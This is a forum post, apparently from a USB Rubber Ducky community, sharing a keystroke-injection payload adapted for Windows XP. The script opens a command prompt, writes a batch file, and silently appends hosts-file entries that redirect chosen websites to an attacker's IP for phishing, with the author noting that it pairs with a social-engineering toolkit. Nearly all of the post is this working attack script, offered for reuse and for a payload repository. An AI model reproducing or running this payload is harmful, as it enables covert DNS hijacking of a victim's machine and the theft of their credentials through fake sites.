Jump to content

[Payload] Ducky Phisher For Winxp


skimpniff
 Share

Recommended Posts

Based on the original script by Koryusai-Kun written for Win7

I take minimal credit for this, I only took a great script and modified it for XP.

Darren, how do we get new payloads onto the GitHub site? Through you or is there a more direct way?



REM Author: .:skimpniff:.
REM Based on the original script by Koryusai-Kun written for Win7
REM Modified for use on WinXP
REM Description: Used for phishing, it add's ips of your choosing to the hosts file on windows
REM Description: so when the user types the website into there web browser it redirects them
REM Description: to your evil IP. Works perfectly in conjunction with SET.
REM Description: Don't forget to add both versions, with and without the www prefix.
GUI r
DELAY 600
STRING cmd
DELAY 400
STRING cd %WINDIR%\system32\drivers\etc\
DELAY 400
STRING copy con inject.bat
DELAY 400
ENTER
DELAY 400
STRING SET NEWLINE=^& echo.
ENTER
DELAY 400
STRING FIND /C /I "WEBSITE" %WINDIR%\system32\drivers\etc\hosts
ENTER
DELAY 400
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^EVIL.IP.ADDRESS WEBSITE>>%WINDIR%\system32\drivers\etc\hosts
ENTER
STRING FIND /C /I "www.WEBSITE" %WINDIR%\system32\drivers\etc\hosts
ENTER
DELAY 400
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^EVIL.IP.ADDRESS www.WEBSITE>>%WINDIR%\system32\drivers\etc\hosts
ENTER
DELAY 400
CONTROL z
ENTER
DELAY 400
STRING inject.bat
ENTER
DELAY 600
STRING exit
ENTER
 
Edited by midnitesnake
formatting
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...